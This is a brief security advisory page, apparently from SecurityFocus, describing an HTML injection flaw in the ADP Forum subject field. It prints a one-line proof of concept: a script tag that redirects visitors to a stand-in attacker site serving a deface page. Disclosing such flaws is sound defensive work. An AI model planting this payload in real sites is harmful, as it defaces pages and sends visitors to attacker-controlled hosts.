info
discussion
exploit
solution
references
ADP Forum Subject Field HTML Injection Vulnerability
This issue can be exploited with a web browser.
The following proof of concept is available:
Subject :<script>location.href="http://evilsite.com/deface.html";</script>
Privacy Statement
Copyright 2010, SecurityFocus
